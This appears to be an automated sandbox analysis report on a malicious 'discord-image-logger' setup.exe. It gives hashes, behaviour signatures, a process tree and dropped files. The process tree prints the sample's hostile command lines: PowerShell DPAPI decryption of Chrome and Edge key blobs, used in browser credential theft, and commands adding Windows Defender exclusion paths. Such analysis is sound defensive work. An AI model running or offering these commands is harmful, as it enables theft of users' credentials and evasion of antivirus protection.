Analysis

  • max time kernel
    100s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/04/2025, 04:05

General

  • Target

    discord-image-logger-main/discord-image-logger-main/setup.exe

  • Size

    37.2MB

  • MD5

    7d7cf419472226353cad4fa52730b5e4

  • SHA1

    d545b9124465f3a37bd30adf74158ca94d223622

  • SHA256

    b2f974a98abb0cb61bfa61c58887a2a0acb73f9b16074d2bd740f2c66c9fe513

  • SHA512

    7e51e533dbdf6b42b3f9e51a2ef3e7b20c532053d0b46d8aac277d1cfd4e1638f5692983dff5ac7fd805c996240cd048089b72965fe75a922ad5029b801dec1a

  • SSDEEP

    393216:JQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mgU96l+ZArYsFRlCbC:J3on1HvSzxAMNUFZArYsKbG/Pvx7OZQn

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\discord-image-logger-main\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\discord-image-logger-main\setup.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:5108
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:2772
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3708
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:376
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,188,150,139,13,229,112,90,72,131,57,79,191,173,84,91,219,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,169,63,141,155,47,68,145,74,172,20,53,124,24,134,42,16,131,77,187,246,211,23,154,104,38,61,251,94,230,98,80,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,198,98,218,208,182,200,33,140,32,70,38,61,112,247,15,162,255,203,205,243,107,81,112,165,176,225,250,254,166,20,190,85,48,0,0,0,138,36,61,150,156,235,37,28,111,25,227,57,239,7,75,127,194,226,228,207,109,16,63,64,24,23,156,97,163,248,32,44,38,186,165,152,104,5,218,169,200,5,212,40,128,151,182,126,64,0,0,0,10,230,88,29,106,210,28,88,211,75,157,226,23,128,170,15,228,55,105,31,12,229,70,22,25,184,200,30,187,121,191,222,230,148,206,112,246,39,98,253,55,223,122,96,235,95,10,186,105,100,49,136,215,137,157,15,237,199,14,236,18,100,151,91), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:4380
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,188,150,139,13,229,112,90,72,131,57,79,191,173,84,91,219,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,169,63,141,155,47,68,145,74,172,20,53,124,24,134,42,16,131,77,187,246,211,23,154,104,38,61,251,94,230,98,80,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,198,98,218,208,182,200,33,140,32,70,38,61,112,247,15,162,255,203,205,243,107,81,112,165,176,225,250,254,166,20,190,85,48,0,0,0,138,36,61,150,156,235,37,28,111,25,227,57,239,7,75,127,194,226,228,207,109,16,63,64,24,23,156,97,163,248,32,44,38,186,165,152,104,5,218,169,200,5,212,40,128,151,182,126,64,0,0,0,10,230,88,29,106,210,28,88,211,75,157,226,23,128,170,15,228,55,105,31,12,229,70,22,25,184,200,30,187,121,191,222,230,148,206,112,246,39,98,253,55,223,122,96,235,95,10,186,105,100,49,136,215,137,157,15,237,199,14,236,18,100,151,91), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5012
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,188,150,139,13,229,112,90,72,131,57,79,191,173,84,91,219,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,115,55,150,121,193,156,138,106,253,205,81,129,230,27,16,185,19,112,76,153,201,62,188,228,202,74,177,52,93,217,132,170,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,124,214,247,66,60,238,218,88,18,176,167,223,14,26,28,217,168,248,109,181,132,138,232,149,160,108,13,1,199,36,59,48,0,0,0,78,210,119,132,20,22,21,206,73,56,253,30,7,73,245,76,157,248,47,169,89,1,31,7,237,23,31,233,60,153,220,58,130,195,71,241,165,37,112,220,233,204,205,162,237,76,142,122,64,0,0,0,50,225,49,198,194,34,103,179,216,74,130,83,138,140,6,86,252,1,224,25,184,22,228,144,60,74,158,203,169,106,20,161,227,65,144,73,188,221,104,194,144,164,151,140,22,239,0,178,85,208,0,137,52,93,25,250,39,233,244,13,107,54,97,207), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:4964
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,188,150,139,13,229,112,90,72,131,57,79,191,173,84,91,219,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,115,55,150,121,193,156,138,106,253,205,81,129,230,27,16,185,19,112,76,153,201,62,188,228,202,74,177,52,93,217,132,170,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,124,214,247,66,60,238,218,88,18,176,167,223,14,26,28,217,168,248,109,181,132,138,232,149,160,108,13,1,199,36,59,48,0,0,0,78,210,119,132,20,22,21,206,73,56,253,30,7,73,245,76,157,248,47,169,89,1,31,7,237,23,31,233,60,153,220,58,130,195,71,241,165,37,112,220,233,204,205,162,237,76,142,122,64,0,0,0,50,225,49,198,194,34,103,179,216,74,130,83,138,140,6,86,252,1,224,25,184,22,228,144,60,74,158,203,169,106,20,161,227,65,144,73,188,221,104,194,144,164,151,140,22,239,0,178,85,208,0,137,52,93,25,250,39,233,244,13,107,54,97,207), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:380
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.UmbO9Tn2qS""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.UmbO9Tn2qS"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3152
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4676
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1012
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      2⤵
        PID:4712
      • C:\Users\Admin\AppData\Local\Temp\python-installer.exe
        C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4716
        • C:\Windows\Temp\{9C33323A-E896-4F7A-811D-AD1F5A8A88FB}\.cr\python-installer.exe
          "C:\Windows\Temp\{9C33323A-E896-4F7A-811D-AD1F5A8A88FB}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=536 -burn.filehandle.self=532 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:3920
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
        2⤵
          PID:5052
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
        1⤵
          PID:4936

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          f48896adf9a23882050cdff97f610a7f

          SHA1

          4c5a610df62834d43f470cae7e851946530e3086

          SHA256

          3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78

          SHA512

          16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          b1c6031f9c81b148749556e84b441f99

          SHA1

          94074cea9fe5127bd3281232ab0c613d1f552621

          SHA256

          a43b7b7caa3fdfd86a401e47ba2f78c574591bb7fcdaf5caeb5cee74ce35e102

          SHA512

          eefd21cf46408618dd19158348527ddf8bb9d8220fa9d858659f6cc7b7cb4dda5c2409a0fc363afdd4bb07e55dc4c34b294c71030a68e447eea6c4999b98db1a

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          711ac708e6810a51e00608a8259ea9dd

          SHA1

          43a65a6b31786c481b39aa979db87989c3e63774

          SHA256

          995d8499e43940a4ce06e16acd7d7c80522a26b3d5f415cf3394980cec60dbd9

          SHA512

          cf431c77da9435ffad977fa6bcea978f4a56c353c64d2064eba5e23eb3b0b1ffc2b295ccdde3a1c6c233265a29513c48980b54af643efd40f35d52cc8fac9263

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          220664462ea810a4572152d0f0b6e524

          SHA1

          f062ddaeeb8c611debed3d3391d49e2de1217767

          SHA256

          0c1ac9db0ec1cf4253d432a6d4dce8778a7b6192dd9f0a583f66b6957f32892e

          SHA512

          a949097c8a28312c26c9427004159f262b5ec89f3f43b217f613f0fceff8093fb7b07654c36b66271672e33869b22bd25a5d8a62a4163228f38b447fd9ae5df0

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nhbabajj.zuf.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

          Filesize

          1.8MB

          MD5

          66a65322c9d362a23cf3d3f7735d5430

          SHA1

          ed59f3e4b0b16b759b866ef7293d26a1512b952e

          SHA256

          f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

          SHA512

          0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

        • C:\Users\Admin\AppData\Local\Temp\python-installer.exe

          Filesize

          25.3MB

          MD5

          d8548aa7609a762ba66f62eeb2ca862d

          SHA1

          2eb85b73cab52693d3a27446b7de1c300cc05655

          SHA256

          5914748e6580e70bedeb7c537a0832b3071de9e09a2e4e7e3d28060616045e0a

          SHA512

          37fa7250b10b0c03b87d800bf4f920589649309cb4fbd25864475084bb7873d62b809a4fdeabd06c79f03f33614218eb7e01a9bd796de29dd3b141f1906d588c

        • C:\Windows\Temp\{9C33323A-E896-4F7A-811D-AD1F5A8A88FB}\.cr\python-installer.exe

          Filesize

          858KB

          MD5

          931227a65a32cebf1c10a99655ad7bbd

          SHA1

          1b874fdef892a2af2501e1aaea3fcafb4b4b00c6

          SHA256

          1dcf770dc47264f7495a559f786a4428f3a97f9d81e4c466ec9a5636f5a1be6d

          SHA512

          0212b5adc6ee8893edf4b94272fdffe145f53fe31357a3e024543f434cdc022a915d76780c1103aa9948feca5f161cfae608f91f3c7a876569e91c05d690d507

        • C:\Windows\Temp\{DCE423D3-4E70-44FD-BAC4-CE1296D0C11D}\.ba\PythonBA.dll

          Filesize

          675KB

          MD5

          8c8e5a5ca0483abdc6ad6ef22c73b5d2

          SHA1

          9b7345ab1b60bb3fb37c9dc7f331155b4441e4dc

          SHA256

          edc6db3712eb4e1cd6988bc7b42c467ac6901148f3ee4bdfb286eff26efbfd43

          SHA512

          861ad726872b58e5b8b7c580b485e7bde0be6c1963ac23db63d4105684d1e50e8f409cd329f183d252a52e2be2737efaf9e4413eff29deee75b87850664b3157

        • C:\Windows\Temp\{DCE423D3-4E70-44FD-BAC4-CE1296D0C11D}\.ba\SideBar.png

          Filesize

          50KB

          MD5

          888eb713a0095756252058c9727e088a

          SHA1

          c14f69f2bef6bc3e2162b4dd78e9df702d94cdb4

          SHA256

          79434bd1368f47f08acf6db66638531d386bf15166d78d9bfea4da164c079067

          SHA512

          7c59f4ada242b19c2299b6789a65a1f34565fed78730c22c904db16a9872fe6a07035c6d46a64ee94501fbcd96de586a8a5303ca22f33da357d455c014820ca0

        • C:\Windows\Temp\{DCE423D3-4E70-44FD-BAC4-CE1296D0C11D}\path_JustForMe

          Filesize

          48KB

          MD5

          3795cc956438ebab0af54f62f5267f42

          SHA1

          03db07d69d2e84c1db1397173f027eb96181d8fb

          SHA256

          3acb37c76d4aad92f5f0d6b00195f76e27513839121ada3b9bb8ab69c1bf612b

          SHA512

          4af037b570486b23fe4a283fd4918759c18763716e50da21559d5ad5d0727ef1af178f0190bb2fe6d31d3b702c938ad45a78fe690a527ef4cb425da1652e3bf7

        • memory/5012-83-0x0000027BF46B0000-0x0000027BF4700000-memory.dmp

          Filesize

          320KB

        • memory/5012-73-0x0000027BF2480000-0x0000027BF24A2000-memory.dmp

          Filesize

          136KB